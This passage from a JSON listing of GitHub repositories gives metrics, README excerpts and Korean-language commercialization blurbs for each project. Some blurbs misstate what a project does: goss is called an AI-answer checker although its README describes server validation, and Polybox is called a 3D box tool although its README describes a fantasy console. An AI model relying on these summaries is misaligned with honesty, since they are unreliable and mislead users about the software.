alt=\"Download for macOS\"/></a>\n</div>\n\n<br/><br/>\n\n<div align=\"center\">\n<a href=\"https://github.com/MonitorControl/MonitorControl/releases\"><img src=\"https://img.shields.io/github/downloads/MonitorControl/MonitorControl/total.svg?style=flat\" alt=\"downloads\"/></a>\n<a href=\"https://github.com/MonitorControl/MonitorControl/releases\"><img src=\"https://img.shields.io/github/release-pre/MonitorControl/MonitorControl.svg?style=flat\" alt=\"latest version\"/></a>\n<a href=\"https://github.com/MonitorControl/MonitorControl/blob/master/License.txt\"><img src=\"https://img.shields.io/github/license/MonitorControl/MonitorCon","composite_score":0.29,"license_safety_tag":"safe"},{"name":"satori/go.uuid","github_url":"https://github.com/satori/go.uuid","stars":5,"language":"Go","license":"mit","abandonment_months":22,"description":"# satori/go.uuid 분석\n\n## 왜 보물인가\n온라인 서비스에서 사용자나 데이터를 고유하게 식별하는 핵심 기능을 제공하는 필수 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 사용자 계정 생성 시 각 사용자에게 고유한 ID를 자동으로 부여하는 회원가입 시스템\n2. **내부 업무 도구**: 회사 내 문서나 거래 기록에 중복되지 ","readme_excerpt":"# UUID package for Go language\n\n[![Build Status](https://travis-ci.org/satori/go.uuid.svg?branch=master)](https://travis-ci.org/satori/go.uuid)\n[![Coverage Status](https://coveralls.io/repos/github/satori/go.uuid/badge.svg?branch=master)](https://coveralls.io/github/satori/go.uuid)\n[![GoDoc](http://godoc.org/github.com/satori/go.uuid?status.svg)](http://godoc.org/github.com/satori/go.uuid)\n\nThis package provides pure Go implementation of Universally Unique Identifier (UUID). Supported both creation and parsing of UUIDs.\n\nWith 100% test coverage and benchmarks out of box.\n\nSupported versions:\n* Version 1, based on timestamp and MAC address (RFC 4122)\n* Version 2, based on timestamp, MAC address and POSIX UID/GID (DCE 1.1)\n* Version 3, based on MD5 hashing (RFC 4122)\n* Version 4, based on random numbers (RFC 4122)\n* Version 5, based on SHA-1 hashing (RFC 4122)\n\n## Installation\n\nUse the `go` command:\n\n\t$ go get github.com/satori/go.uuid\n\n## Requirements\n\nUUID package tested against Go >= ","composite_score":0.2893,"license_safety_tag":"safe"},{"name":"wangyu-/UDPspeeder","github_url":"https://github.com/wangyu-/UDPspeeder","stars":6,"language":"C++","license":"MIT","abandonment_months":5,"description":"# UDPspeeder 상용화 분석\n\n## 왜 보물인가\n인터넷 연결이 불안정한 환경에서도 영상 통화나 온라인 게임을 끊김 없이 즐길 수 있게 해주는 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **원격 근무 화상회의 서비스**: 저대역폭 지역의 직원들도 회의 중단 없이 참여할 수 있는 SaaS 플랫폼\n2. **글로벌 게이밍 가속화 API**: 게임사들이 ","readme_excerpt":"# UDPspeeder\n\nA Tunnel which Improves your Network Quality on a High-latency Lossy Link by using Forward Error Correction.\n\nWhen used alone, UDPspeeder improves only UDP connection. Nevertheless, if you used UDPspeeder + any UDP-based VPN together,\nyou can improve any traffic(include TCP/UDP/ICMP), currently OpenVPN/L2TP/ShadowVPN are confirmed to be supported。\n\n![](/images/en/udpspeeder.PNG)\n\nor\n\n![image_vpn](/images/en/udpspeeder+openvpn3.PNG)\n\nAssume your local network to your server is lossy. Just establish a VPN connection to your server with UDPspeeder + any UDP-based VPN, access your server via this VPN connection, then your connection quality will be significantly improved. With well-tuned parameters , you can easily reduce IP or UDP/ICMP packet-loss-rate to less than 0.01% . Besides reducing packet-loss-rate, UDPspeeder can also significantly improve your TCP latency and TCP single-thread download speed.\n\n[UDPspeeder Wiki](https://github.com/wangyu-/UDPspeeder/wiki)\n\n[简体中文](/d","composite_score":0.2893,"license_safety_tag":"safe"},{"name":"tecosaur/OrgMode.jl","github_url":"https://github.com/tecosaur/OrgMode.jl","stars":5,"language":"Julia","license":"NOASSERTION","abandonment_months":14,"description":"# OrgMode.jl 상용화 분석\n\n## 왜 보물인가\n복잡한 문서 작업을 자동으로 정리해주는 도구로, 연구자나 글 작가들이 시간을 크게 절약할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 학위논문·보고서 자동 포맷팅 및 관리 웹 플랫폼\n- **내부 업무 도구**: 대기업 R&D팀의 연구 데이터 및 노트 통합 관리 시스템\n- **A","readme_excerpt":"#+title: Org.jl\n#+author: tecosaur\n\n#+html: <a href=\"https://coveralls.io/github/tecosaur/Org.jl\"><img src=\"https://coveralls.io/repos/github/tecosaur/Org.jl/badge.svg?branch=v1\"></a>\n\n#+html: <img src=\"org-mode-jl.svg\" align=\"right\">\n\n#+begin_quote\n⚠️ *This package is currently undergoing a rewrite* ⚠️\n#+end_quote\n\nA library for working with Org files. Specifically, this provides utilities for:\n\n+ Parsing Org text to an AST (Abstract Syntax Tree)\n+ Regenerating Org text from an AST\n+ Basic manipulation and analysis of an Org document AST\n+ Generating basic representations Org content in the terminal, and a few other forms.\n\nWith the exception of some of the /particularly fancy/ capabilities provided by\n=org-mode= (like Babel and Calc-based spreadsheeting), this project aims to\nexactly match the interpretation of Org mode markup --- specifically the AST\ngenerated by =org-element.el=. This goal is not yet achieved, however\nthe bulk of the work is now complete.\n\n*Org.jl* implements the v","composite_score":0.2892,"license_safety_tag":"unknown"},{"name":"mengshukeji/Luckysheet","github_url":"https://github.com/mengshukeji/Luckysheet","stars":10,"language":"JavaScript","license":"MIT","abandonment_months":9,"description":"# Luckysheet 상용화 분석\n\n## 왜 보물인가\n엑셀처럼 사용할 수 있는 웹 기반 스프레드시트로, 복잡한 설치 없이 브라우저에서 바로 표와 계산을 할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 회계 소프트웨어나 재무 분석 플랫폼에 내장하여 사용자가 직접 데이터를 편집하고 분석하는 기능 제공\n2. **내부 업무 도구**: ","readme_excerpt":"<div align=\"center\">\r\n\r\n![logo](/docs/.vuepress/public/img/logo_text.png)\r\n\r\n[![Join the chat at https://gitter.im/mengshukeji/Luckysheet](https://badges.gitter.im/mengshukeji/Luckysheet.svg)](https://gitter.im/mengshukeji/Luckysheet?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\r\n<a href=\"https://twitter.com/intent/follow?screen_name=luckysheet\">\r\n        <img src=\"https://img.shields.io/twitter/follow/luckysheet?style=social&logo=twitter\"\r\n            alt=\"follow on Twitter\"></a>\r\n\r\n</div>\r\n\r\nEnglish| [简体中文](./README-zh.md)\r\n\r\n# Luckysheet is no longer maintained. It is recommended to use the upgraded version of [Univer](https://univer.short.gy/LuckysheetRepository) for production environment deployment. The new version solves problems such as large data loading, chart styles, pivot tables, formula calculations, etc., and has made many optimization designs, added import, export, printing, collaboration and other functions, improved table performance, and h","composite_score":0.289,"license_safety_tag":"safe"},{"name":"aws/aws-amplify","github_url":"https://github.com/aws/aws-amplify","stars":6,"language":"TypeScript","license":"Apache-2.0","abandonment_months":0,"description":"# AWS Amplify 저장소 분석\n\n## 왜 보물인가\nAWS가 공식 지원하는 이 도구는 웹과 앱 개발을 획기적으로 단순화하여, 개발 시간을 절반 이상 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 스타트업이 빠르게 로그인·데이터 관리 기능을 갖춘 웹앱을 출시할 수 있는 기반 제공\n- **내부 업무 도구**: 기업의 HR·회계","readme_excerpt":"<img src=\"https://s3.amazonaws.com/aws-mobile-hub-images/aws-amplify-logo.png\" alt=\"AWS Amplify\" width=\"550\" >\n\n[![current aws-amplify package version](https://img.shields.io/npm/v/aws-amplify?color=brightgreen&label=npm%20package)](https://www.npmjs.com/package/aws-amplify)\n[![weekly downloads](https://img.shields.io/npm/dw/aws-amplify)](https://www.npmjs.com/package/aws-amplify)\n[![GitHub Workflow Status (with event)](https://img.shields.io/github/actions/workflow/status/aws-amplify/amplify-js/push-main-release.yml)\n](https://github.com/aws-amplify/amplify-js/blob/main/.github/workflows/push-main-release.yml)\n[![code coverage](https://codecov.io/gh/aws-amplify/amplify-js/branch/main/graph/badge.svg)](https://codecov.io/gh/aws-amplify/amplify-js)\n[![join discord](https://img.shields.io/discord/308323056592486420?logo=discord)](https://discord.gg/jWVbPfC)\n\n### Reporting Bugs / Feature Requests\n\n[![Open Bugs](https://img.shields.io/github/issues/aws-amplify/amplify-js/bug?color=d73a4a&l","composite_score":0.289,"license_safety_tag":"safe"},{"name":"restify/node-restify","github_url":"https://github.com/restify/node-restify","stars":6,"language":"JavaScript","license":"mit","abandonment_months":20,"description":"# Restify 저장소 분석 보고서\n\n## 왜 보물인가\n웹 서비스를 빠르고 안정적으로 만들기 위한 검증된 기반 도구로, 많은 기업들이 이미 신뢰하고 있는 표준 기술입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 클라우드 기반 업무 관리 플랫폼의 백엔드 서버 구축\n- **내부 업무 도구**: 대기업의 사내 데이터 조회 및 처리 시스템 개발\n","readme_excerpt":"<!-- Please don't remove this: Grab your social icons from https://github.com/carlsednaoui/gitsocial -->\n\n<!-- display the social media buttons in your README -->\n\n[![alt text][1.1]][1]\n\n\n<!-- links to social media icons -->\n<!-- no need to change these -->\n\n<!-- icons with padding -->\n\n[1.1]: http://i.imgur.com/tXSoThF.png (twitter icon with padding)\n\n<!-- icons without padding -->\n\n[1.2]: http://i.imgur.com/wWzX9uB.png (twitter icon without padding)\n\n\n<!-- links to your social media accounts -->\n<!-- update these accordingly -->\n\n[1]: http://www.twitter.com/restifyjs\n\n<!-- Please don't remove this: Grab your social icons from https://github.com/carlsednaoui/gitsocial -->\n\n![restify](/../gh-images/logo/png/restify_logo_black_transp_288x288.png?raw=true \"restify\")\n\n[![Build Status](https://travis-ci.org/restify/node-restify.svg?branch=master)](https://travis-ci.org/restify/node-restify)\n[![Dependency Status](https://david-dm.org/restify/node-restify.svg)](https://david-dm.org/restify/n","composite_score":0.2884,"license_safety_tag":"safe"},{"name":"aelsabbahy/goss","github_url":"https://github.com/aelsabbahy/goss","stars":13,"language":"Go","license":"apache-2.0","abandonment_months":13,"description":"# goss 저장소 분석\n\n## 왜 보물인가\nAI가 생성한 결과물이 실제로 맞는지 자동으로 검증하는 도구로, 신뢰할 수 없는 AI 답변으로 인한 비즈니스 손실을 방지할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: AI 챗봇 플랫폼에 내장하여 답변 정확도를 실시간으로 모니터링하고 오류가 많은 응답 자동 필터링\n- **내부 업무 도구*","readme_excerpt":"# Goss - Quick and Easy server validation\n\n[![Build Status](https://travis-ci.org/goss-org/goss.svg?branch=master)](https://travis-ci.org/goss-org/goss)\n[![Github All Releases](https://img.shields.io/github/downloads/goss-org/goss/total.svg?maxAge=604800)](https://github.com/goss-org/goss/releases)\n[![Documentation Status](https://readthedocs.org/projects/goss/badge/)](https://goss.rocks/)\n**\n[![Blog](https://img.shields.io/badge/follow-blog-brightgreen.svg)](https://medium.com/@aelsabbahy)\n\n<!-- --8<-- [start:intro] -->\n\n## Goss in 45 seconds\n\n<!-- markdownlint-disable line-length no-inline-html-->\n<a href=\"https://asciinema.org/a/4suhr8p42qcn6r7crfzt6cc3e?autoplay=1\" target=\"_blank\"><img src=\"https://cloud.githubusercontent.com/assets/6783261/17330426/ce7ad066-5894-11e6-84ea-29fd4207af58.gif\" alt=\"asciicast\"></a>\n<!-- markdownlint-enable line-length no-inline-html -->\n\n**Note:** For testing containers see the [dgoss](https://github.com/goss-org/goss/tree/master/extras/dgoss) wrapper.","composite_score":0.2883,"license_safety_tag":"safe"},{"name":"DavidColson/Polybox","github_url":"https://github.com/DavidColson/Polybox","stars":15,"language":"C++","license":"MIT","abandonment_months":14,"description":"# Polybox 프로젝트 분석\n\n## 왜 보물인가\n3D 박스 모양의 그래픽을 쉽게 만들 수 있는 도구로, 게임이나 영상 제작 전문가들이 수작업으로 하던 작업을 자동화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **게임 개발 SaaS**: 인디 게임 제작자들이 구독료를 내고 간단히 3D 에셋을 생성하는 웹서비스\n2. **영상 제작 도구**: 유튜브 ","readme_excerpt":"# Polybox\n\nPolybox is an in-development PS1 era fantasy console, a bit like Pico-8, but with simple 3D as well as 2D.\n\n![polybox render](ReadmeImage.png)\n\nIt's still rather primitive and early in development, mostly it's just a dedicated PS1 renderer right now with an old fashioned fix function pipeline. You render use it like this:\n\n```lua\nfunction update()\n    set_clear_color(0.25, 0.25, 0.25, 1.0)\n\n\tmatrix_mode(\"Projection\")\n    identity()\n    perspective(320, 240, 1, 20, 60)\n\n    matrix_mode(\"View\")\n    identity()\n    translate(-1.5, -1.5, -2)\n\n\tbegin_object_3d(\"Triangles\")\n        color(1.0, 0.0, 0.0, 1.0)\n        vertex(1.0, 1.0, 0.0)\n\n        color(0, 1, 0, 1)\n        vertex(1, 2, 0)\n\n        color(0, 0, 1, 1)\n        vertex(2.0, 2.0, 0.0)\n    end_object_3d()\nend\n```\n\nThe above gives you the following output:\n\n![polybox render](ReadmeImage2.png)\n\n# Current features\n\n- PS1 era fixed-function 3D rendering\n- Basic flat and smooth shaded lighting\n- Gltf model loading\n- 2D sprite dra","composite_score":0.2879,"license_safety_tag":"safe"},{"name":"Radon-Games/Radon-Games","github_url":"https://github.com/Radon-Games/Radon-Games","stars":216,"language":"TypeScript","license":"AGPL-3.0","abandonment_months":10,"description":"","readme_excerpt":"","composite_score":0.2879,"license_safety_tag":"risky"},{"name":"cloudflare/lol-html","github_url":"https://github.com/cloudflare/lol-html","stars":16,"language":"Rust","license":"BSD-3-Clause","abandonment_months":0,"description":"# cloudflare/lol-html 분석 보고서\n\n## 왜 보물인가\n웹사이트의 내용을 빠르고 안전하게 수정하는 도구로, 대규모 웹 서비스 회사들이 필수적으로 필요로 하는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **이메일 마케팅 플랫폼**: 고객이 작성한 이메일 템플릿에서 위험한 코드를 자동으로 제거하고 안전하게 정제하는 기능\n2. **웹사이트","readme_excerpt":"# LOL HTML\n\n<p align=\"center\">\n    <a href=\"https://github.com/cloudflare/lol-html\">\n        <img src=\"media/logo.png\" alt=\"The logo is generated from https://openmoji.org/data/color/svg/1F602.svg by Emily Jäger which is licensed under CC BY-SA 4.0 (https://creativecommons.org/licenses/by-sa/4.0/)\" style=\"width:472px; height: 375px\" />\n    </a>\n</p>\n\n\n***L**ow **O**utput **L**atency streaming **HTML** rewriter/parser with CSS-selector based API.*\n\nIt is designed to modify HTML on the fly with minimal buffering. It can quickly handle very large\ndocuments, and operate in environments with limited memory resources. More details can be found in the [blog post](https://blog.cloudflare.com/html-parsing-2/).\n\nThe crate serves as a back-end for the HTML rewriting functionality of\n[Cloudflare Workers](https://www.cloudflare.com/en-gb/products/cloudflare-workers/), but can be used\nas a standalone library with a convenient API for a wide variety of HTML rewriting/analysis tasks.\n\n## Documentation","composite_score":0.2877,"license_safety_tag":"safe"},{"name":"oblador/flipper-plugin-react-native-performance","github_url":"https://github.com/oblador/flipper-plugin-react-native-performance","stars":12,"language":"TypeScript","license":"MIT","abandonment_months":7,"description":"# Flipper Plugin React Native Performance 분석\n\n## 왜 보물인가\n스마트폰 앱의 성능 문제를 개발 단계에서 즉시 발견하고 해결할 수 있는 전문가용 진단 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **앱 개발사의 SaaS 형 품질관리 플랫폼**: 수백 개 앱을 동시에 모니터링하는 통합 대시보드 제공\n2. **모바일 게임사","readme_excerpt":"# React Native Performance tooling\n\nToolchain to measure and monitor the performance of your React Native app in development, pipeline and in production.\n\n## Packages\n\n### [`react-native-performance`](https://github.com/oblador/react-native-performance/blob/master/packages/react-native-performance/README.md)\n\nAn implementation of the [`Performance` API](https://developer.mozilla.org/en-US/docs/Web/API/Performance) for React Native.\n\n- Integrates well with `React.Profiler` API\n- Trace arbitrary events in your app such as component render time\n- Capture network traffic\n- Collect native traces such as script execution and time to interactive of root view\n- Collect native metrics in development such as JS bundle size\n\n### [`isomorphic-performance`](https://github.com/oblador/react-native-performance/blob/master/packages/isomorphic-performance/README.md)\n\nIsomorphic Performance API for Node, Browser & React Native. Useful if your app targets both web and native.\n\n## Demo\n\nSee the projects i","composite_score":0.2873,"license_safety_tag":"safe"},{"name":"styled-components/vscode-styled-components","github_url":"https://github.com/styled-components/vscode-styled-components","stars":5,"language":"JavaScript","license":"mit","abandonment_months":23,"description":"# styled-components/vscode-styled-components 분석\n\n## 왜 보물인가\n웹 개발자들이 디자인 코드를 작성할 때 실수를 줄이고 작업 속도를 높일 수 있는 편의 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 웹 기반 디자인 협업 플랫폼에 통합하여 팀 작업 효율성 향상\n- **내부 업무 도구**: 대규모 웹","readme_excerpt":"**NOTE**: _Sadly this repository is no longer supported or updated by the Styled Components team as of June 2024. If you wish to help develop this code please reach out on Discord or in the [issue](https://github.com/styled-components/vscode-styled-components/issues/275). We can unarchive this repo if we get contributors but until then it will remain the way it is._\n\n\n# vscode-styled-components\n\nStyled Components has moved! Make sure you're downloading it from here:\nhttps://marketplace.visualstudio.com/items?itemName=styled-components.vscode-styled-components. The `jpoissonnier.vscode-styled-components ` version will recieve no more updates.\n\n<a href=\"https://discord.gg/hfGUrbrxaU\">![Discord](https://img.shields.io/discord/818449605409767454?logo=discord)</a>\n\nSyntax highlighting and IntelliSense for [styled-components](https://github.com/styled-components/styled-components).\n\n![Syntax highlighting in action](demo.gif)\n\nUses a CSS grammar built on top of [language-sass](https://github.","composite_score":0.2872,"license_safety_tag":"safe"},{"name":"facebookresearch/LAMA","github_url":"https://github.com/facebookresearch/LAMA","stars":5,"language":"Python","license":"NOASSERTION","abandonment_months":23,"description":"# LAMA 저장소 분석\n\n## 왜 보물인가\n페이스북 연구팀이 만든 이 도구는 AI가 학습한 지식을 테스트하고 검증하는 표준적인 방법을 제공합니다.\n\n## 어디에 쓸 수 있나\n\n**1. AI 교육용 SaaS 플랫폼**\nAI 학습 효과를 측정하는 평가 도구로 제공하여 기업 교육팀에 월 구독료를 받을 수 있습니다.\n\n**2. 내부 AI 품질 관리 도구**\n대형","readme_excerpt":"# LAMA: LAnguage Model Analysis\n<img align=\"middle\" src=\"img/logo.png\" height=\"256\" alt=\"LAMA\">\n\nLAMA is a probe for analyzing the factual and commonsense knowledge contained in pretrained language models. <br>\n#### The dataset for the LAMA probe is available at https://dl.fbaipublicfiles.com/LAMA/data.zip <br>\nLAMA contains a set of connectors to pretrained language models. <br>\nLAMA exposes a transparent and unique interface to use:\n\n- Transformer-XL (Dai et al., 2019)\n- BERT (Devlin et al., 2018)\n- ELMo (Peters et al., 2018)\n- GPT (Radford et al., 2018)\n- RoBERTa (Liu et al., 2019)\n\nActually, LAMA is also a beautiful animal.\n\n## Reference:\n\nThe LAMA probe is described in the following papers:\n\n```bibtex\n@inproceedings{petroni2019language,\n  title={Language Models as Knowledge Bases?},\n  author={F. Petroni, T. Rockt{\\\"{a}}schel, A. H. Miller, P. Lewis, A. Bakhtin, Y. Wu and S. Riedel},\n  booktitle={In: Proceedings of the 2019 Conference on Empirical Methods in Natural Language Proces","composite_score":0.287,"license_safety_tag":"unknown"},{"name":"jroimartin/gocui","github_url":"https://github.com/jroimartin/gocui","stars":45,"language":"Go","license":"bsd-3-clause","abandonment_months":13,"description":"# gocui 저장소 분석\n\n## 왜 보물인가\n터미널(검은 화면)에서 깔끔한 사용자 인터페이스를 만들 수 있게 해주는 도구로, 복잡한 소프트웨어를 마우스로 조작 가능하게 변신시킵니다.\n\n## 어디에 쓸 수 있나\n\n1. **클라우드 서버 관리 SaaS**: AWS, 구글 클라우드 같은 서버 관리 회사가 웹 대신 터미널 기반 관리 도구를 제공할 때 활용\n2. ","readme_excerpt":"# GOCUI - Go Console User Interface\n\n[![Go Reference](https://pkg.go.dev/badge/github.com/jroimartin/gocui.svg)](https://pkg.go.dev/github.com/jroimartin/gocui)\n\nMinimalist Go package aimed at creating Console User Interfaces.\n\n## Features\n\n* Minimalist API.\n* Views (the \"windows\" in the GUI) implement the interface io.ReadWriter.\n* Support for overlapping views.\n* The GUI can be modified at runtime (concurrent-safe).\n* Global and view-level keybindings.\n* Mouse support.\n* Colored text.\n* Customizable edition mode.\n* Easy to build reusable widgets, complex layouts...\n\n## Installation\n\nExecute:\n\n```sh\ngo get github.com/jroimartin/gocui\n```\n\n## Documentation\n\nExecute:\n\n```sh\ngo doc github.com/jroimartin/gocui\n```\n\nOr visit [pkg.go.dev](https://pkg.go.dev/github.com/jroimartin/gocui) to read\nit online.\n\n## Example\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"log\"\n\n\t\"github.com/jroimartin/gocui\"\n)\n\nfunc main() {\n\tg, err := gocui.NewGui(gocui.OutputNormal)\n\tif err != nil {\n\t\tlog.Panicln(err)\n\t}\n\t","composite_score":0.2869,"license_safety_tag":"safe"},{"name":"tongueroo/jets","github_url":"https://github.com/tongueroo/jets","stars":7,"language":"Ruby","license":"MIT","abandonment_months":7,"description":"# Jets 저장소 분석\n\n## 왜 보물인가\n클라우드 환경에서 프로그램을 쉽게 만들고 배포할 수 있는 도구로, 복잡한 기술 없이도 웹 서비스를 빠르게 구축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 초기 스타트업이 최소 비용으로 웹 애플리케이션을 빠르게 런칭하는 데 활용\n- **내부 업무 도구**: 기업의 재무·HR·고객관리 시","readme_excerpt":"<div align=\"center\">\n  <a href=\"http://rubyonjets.com\"><img src=\"http://rubyonjets.com/img/logos/jets-logo-full.png\" /></a>\n</div>\n\n[![Gem Version](https://badge.fury.io/rb/jets.svg)](https://badge.fury.io/rb/jets)\n\n[![BoltOps Badge](https://img.boltops.com/boltops/badges/boltops-badge.png)](https://www.boltops.com)\n\nPlease **watch/star** this repo to help grow and support the project.\n\n## What is Jets?\n\n[Jets](https://www.rubyonjets.com/) is a Serverless Deployment Service. Jets deploys Serverless infrastructure resources to your AWS account, where you can control the concurrency and scale resources as much as you want.\n\nJets makes it easy to deploy and run your app on Serverless. It packages up your code and runs it on [AWS Lambda](https://aws.amazon.com/lambda/). Jets can deploy Rails, Sinatra, and any Rack app.\n\n## Quick Start\n\nAdd to your project.\n\nGemfile\n\n```ruby\ngem \"jets-rails\", \">= 1.0\"\ngem \"jets\", \">= 6.0\"\n```\n\nAnd run\n\n    jets init\n    jets deploy\n\nThat's it.\n\n## Docs\n\nOff","composite_score":0.2867,"license_safety_tag":"safe"},{"name":"bingoogolapple/BGAQRCode-Android","github_url":"https://github.com/bingoogolapple/BGAQRCode-Android","stars":8,"language":"C","license":"unknown","abandonment_months":18,"description":"# BGAQRCode-Android 분석 보고서\n\n## 왜 보물인가\n스마트폰으로 QR코드를 빠르고 정확하게 읽을 수 있는 기술을 제공하는 한국 개발자의 오픈소스 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 모바일 결제 및 송금 서비스**\n- 사용자가 QR코드를 촬영하면 자동으로 송금 정보를 인식하는 서비스\n\n**2. 명함·티켓 인증 앱**\n- 전시","readme_excerpt":":running:BGAQRCode-Android:running:\n============\n\n## 目录\n* [功能介绍](#功能介绍)\n* [常见问题](#常见问题)\n* [效果图与示例 apk](#效果图与示例-apk)\n* [Gradle 依赖](#gradle-依赖)\n* [布局文件](#布局文件)\n* [自定义属性说明](#自定义属性说明)\n* [接口说明](#接口说明)\n* [关于我](#关于我)\n\n## 功能介绍\n根据[之前公司](http://www.iqegg.com)的产品需求，参考 [barcodescanner](https://github.com/dm77/barcodescanner) 改的，希望能帮助到有生成二维码、扫描二维码、识别图片二维码等需求的猿友。修改幅度较大，也就没准备针对 [barcodescanner](https://github.com/dm77/barcodescanner) 库提交PR。\n\n- [x] 可定制各式各样的扫描框\n- [x] 可定制全屏扫描或只识别扫描框区域内码\n- [x] 可定制要识别的码的格式（详细用法查看 TestScanActivity 中的 onClick 方法）\n- [x] 可以控制闪光灯，方便夜间使用\n- [x] 可以设置用前置摄像头扫描\n- [x] 可以二指缩放预览\n- [x] 可以监听环境亮度，提示用户打开、关闭闪光灯\n- [x] 识别到比较小的码时自动放大\n***\n- [x] ZXing 生成可自定义颜色、带 logo 的二维码\n- [x] ZXing 生成一维码\n- [x] ZXing 扫描条码、二维码\n- [x] ZXing 识别图库中的条码、二维码图片\n***\n- [x] ZBar 扫描条码、二维码「已解决中文乱码问题」\n- [x] ZBar 识别图库中的条码、二维码图片\n\n## 常见问题\n#### 1.部分手机无法扫描出结果，扫描预览界面二维码被压缩\n\n使用的时候将 Toolbar 或者其他 View 盖在 ZBarView 或者 ZXingView 的上面，让 ZBarView 或者 ZXingView 填充屏幕宽高。[ZXing 布局文件参考](https://github.com/bingoogolapple/BGAQRCode-Android/blob/mas","composite_score":0.2866,"license_safety_tag":"unknown"},{"name":"tyr-rust-bootcamp/template","github_url":"https://github.com/tyr-rust-bootcamp/template","stars":232,"language":"Rust","license":"NOASSERTION","abandonment_months":22,"description":"","readme_excerpt":"","composite_score":0.2863,"license_safety_tag":"unknown"},{"name":"oblador/react-native-vector-icons","github_url":"https://github.com/oblador/react-native-vector-icons","stars":8,"language":"TypeScript","license":"mit","abandonment_months":0,"description":"","readme_excerpt":"![Vector Icons for React Native](https://cloud.githubusercontent.com/assets/378279/12009887/33f4ae1c-ac8d-11e5-8666-7a87458753ee.png)\n\n[![npm](https://img.shields.io/npm/v/@react-native-vector-icons/common.svg)](https://npmjs.com/package/@react-native-vector-icons/common) [![npm](https://img.shields.io/npm/dm/@react-native-vector-icons/common.svg)](https://npmjs.com/package/@react-native-vector-icons/common)\n\n# React Native Vector Icons\n\nElevate your React Native applications with the power of customizable vector\nicons. Ideal for embellishing buttons, logos, and navigation or tab bars, these\nicons seamlessly integrate into your projects. Their versatility makes\nextension and styling effortless.\n\nFor the integration of `.svg` files natively, you can explore [`react-native-vector-image`](https://github.com/oblador/react-native-vector-image).\n\n> [!TIP]\n> If you are still using the old single package `react-native-vector-icons` visit <https://github.com/oblador/react-native-vector-icons/tr","composite_score":0.2859,"license_safety_tag":"safe"},{"name":"angular/flex-layout","github_url":"https://github.com/angular/flex-layout","stars":6,"language":"TypeScript","license":"mit","abandonment_months":21,"description":"# Angular Flex-Layout 상용화 분석\n\n## 왜 보물인가\n웹사이트나 앱의 화면 레이아웃을 쉽게 만들 수 있도록 도와주는 도구로, 개발자의 작업 시간을 크게 단축시킵니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 노코드 웹 빌더 플랫폼에서 사용자가 드래그앤드롭으로 페이지를 만들 때 기반 기술로 활용\n2. **내부 업무 도구**:","readme_excerpt":"# Angular Flex-Layout\n\n[![npm version](https://badge.fury.io/js/%40angular%2Fflex-layout.svg)](https://www.npmjs.com/package/%40angular%2Fflex-layout)\n[![Build status](https://circleci.com/gh/angular/flex-layout.svg?style=svg)](https://circleci.com/gh/angular/flex-layout)\n[![Gitter](https://badges.gitter.im/angular/flex-layout.svg)](https://gitter.im/angular/flex-layout)\n\n**NOTE: The Angular team no longer publishes new releases of this project. Please review [this blog post](https://blog.angular.io/modern-css-in-angular-layouts-4a259dca9127) \nfor alternatives, and [this article](https://medium.com/@caerus.karu/farewell-flex-layout-aaa567023769) for the explanation and next steps.**\n\nAngular Flex Layout provides a sophisticated layout API using Flexbox CSS + mediaQuery.\nThis module provides Angular developers with component layout features using a\ncustom Layout API, mediaQuery observables, and injected DOM flexbox-2016 CSS stylings.\n\nThe Flex Layout engine intelligently automates the p","composite_score":0.2858,"license_safety_tag":"safe"},{"name":"xiCO2k/laravel-vue-i18n","github_url":"https://github.com/xiCO2k/laravel-vue-i18n","stars":13,"language":"TypeScript","license":"MIT","abandonment_months":14,"description":"# laravel-vue-i18n 분석 리포트\n\n## 왜 보물인가\n전 세계 여러 언어로 웹사이트를 운영하려는 사람들이 복잡한 번역 작업을 자동화할 수 있도록 돕는 작은 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **다국어 SaaS 서비스**: 한국, 일본, 미국 등 여러 나라 고객을 동시에 지원하는 구독형 웹 서비스에서 언어 전환 시스템으로 활용\n2. *","readme_excerpt":"<h1 align=\"center\" style=\"border:none !important\">\n    Laravel Vue i18n\n</h1>\n\n<p align=\"center\">\n    <a href=\"https://github.com/xiCO2k/laravel-vue-i18n/actions\"><img alt=\"GitHub Workflow Status (master)\" src=\"https://github.com/xiCO2k/laravel-vue-i18n/actions/workflows/tests.yaml/badge.svg\"></a>\n    <a href=\"https://www.npmjs.com/package/laravel-vue-i18n\"><img alt=\"License\" src=\"https://img.shields.io/npm/l/laravel-vue-i18n.svg?sanitize=true\"></a>\n    <a href=\"https://www.npmjs.com/package/laravel-vue-i18n\"><img alt=\"Version\" src=\"https://img.shields.io/npm/v/laravel-vue-i18n.svg\"></a>\n    <a href=\"https://www.npmjs.com/package/laravel-vue-i18n\"><img alt=\"Total Downloads\" src=\"https://img.shields.io/npm/dt/laravel-vue-i18n.svg\"></a>\n</p>\n\n<p align=\"center\">\n    <b>laravel-vue-i18n</b> is a <b>Vue3</b> plugin that allows to connect your <b>Laravel</b> Framework translation\n    files with <b>Vue</b>. It uses the same logic used on <a href=\"https://laravel.com/docs/8.x/localization\">Lar","composite_score":0.2857,"license_safety_tag":"safe"},{"name":"caiogondim/bullet-train.zsh","github_url":"https://github.com/caiogondim/bullet-train.zsh","stars":5,"language":"Makefile","license":"mit","abandonment_months":22,"description":"# Bullet Train ZSH 프로젝트 분석\n\n## 왜 보물인가\n컴퓨터 터미널(검은 화면)을 더 예쁘고 쓰기 편하게 만들어주는 무료 디자인 도구로, 개발자들의 작업 효율을 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **개발자 온보딩 SaaS**: 신입 